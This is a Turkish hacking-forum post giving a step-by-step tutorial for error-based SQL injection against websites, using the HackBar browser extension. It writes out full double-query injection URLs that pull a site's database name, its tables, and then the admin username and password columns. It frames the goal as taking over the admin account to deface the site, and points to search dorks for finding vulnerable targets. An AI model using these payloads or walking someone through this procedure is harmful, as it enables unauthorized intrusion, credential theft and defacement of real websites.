- 15 Şub 2021
- 26
- 4
güzel konu eline sağlıkKurulumlar
Öncelikle buradan CyberFox Web Browser indiriyoruz.
Ardından buradan HackBar Pro eklentisini indiriyoruz. VirusTotal
Daha sonra açılan CyberFox tarayıcı ekranında sağ üst köşedeki ≡ işaretine tıklıyoruz ve buradan Add-ons seçeneğini seçiyoruz. Get Add-ons bölümüne, indirdiğimiz "hackbar-v2.6.xpi" dosyasını sürüklüyoruz.
SQL Açıklı Site Nasıl Bulunur?
SQL dorkları kullanarak rahatlıkla bulabiliriz dork paylaşımı yasak olduğundan dolayı örnek veremiyorum fakat forumda dork yazma ile alakalı birkaç konu bulunmakta.
SQL İnjection Nasıl yapılır?
Öncelikle indirdiğimiz CyberFox Web Browser'dan yeni sekme açıyoruz. Bulduğumuz SQL açıklı site www.thtforum.com/index.php?id=24 olarak var sayıyorum.
Bu görseldeki gibi HackBar'a yazıyorum ve siteye giriş yapıyoruz..
Ardından URL'nin sonuna " ' " koyarak hata vermesini sağlıyoruz yani;
www.thtforum.com/index.php?id=24'
şeklinde daha sonra URL'nin yanına bir "+" koyup HackBar'dan
Görseldeki gibi "Error\Double Query/ Error Based/ Get Database" tıklıyoruz. Sonra Boşluk bırakıp "-- +-" yazıyoruz. URL en son bu şekilde görünmeli;
www.thtforum.com/index.php?id=24'++AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- +-
Sol taraftan Execute butonuna basıyoruz. Database karşımıza "Duplicate entry 'database_adi' for key 'group_key'" böyle geliyor Duplicate entry den sonra tırnak içerisinde olan database adımız bunu kopyalıyoruz ve herhangi bir not defterine saklıyoruz.
Şimdi ise tablolarımızı çekmek için
URL'mizde php?id=24'+'Den sonrasını -- +-'Den öncesine kadar seçiyoruz ve siliyoruz. URL en son bu şekilde görünmeli;
www.thtforum.com/index.php?id=24'+ -- +-
Daha sonra php?id=24'+'nın sonuna
Görseldeki gibi "Error\Double Query/ Error Based/ Get Tables" tıklıyoruz. Bizden DataBase adı istiyor az önceki işlemde aldığımız DataBase adını buraya yapıştırıyoruz. URL en son bu şekilde görünmeli;
www.thtforum.com/index.php?id=24'++AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6461746162617365616469+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -- +-
Execute butonuna basıyoruz ve URL'deki "LIMIT+0,1)" içerisindeki 0'ı giderek arttırıp execute diyoruz ve bize lazım olan tabloyu arıyoruz. İndex basmak istiyorsak bize admin bilgileri gerekiyor yani "users" tablosu buluyorum.
Ve tekrardan php?id=24'+'Den sonrasını -- +-'Den öncesine kadar seçiyoruz ve siliyoruz aynı işlemleri yapıyoruz yanlızca sonda "Error\Double Query / Error Based/ Get Columns" seçiyoruz. Bizden DataBase adı, tablo adı isteyecektir bunları da giriyoruz.
Tekrardan URL içindeki LİMİT'i arttırarak bize lazım olan kolonları arıyoruz bize "username, password" kolonları gerektiği için onları buluyorum.
php?id=24'+'Den sonrasını -- +-'Den öncesini seçip siliyoruz ve "Error\Double Query/ Error Based/ Get Data" diyoruz.
Bizden DataBase adı, tables adı, columns adı isteyecektir. columns adına öncelikle "username" yazıyoruz ve admin kullanıcı adlarını not defterimize yapıştırdıktan sonra aynı işlemi columns adına "password" yazarak admin şifresini not ediyoruz. Bu sayede SQL İnjection ile admin bilgilerine sahip olduk. Admin girişi sağlayarak siteye istediğimizi yapabiliriz
İyi forumlar..
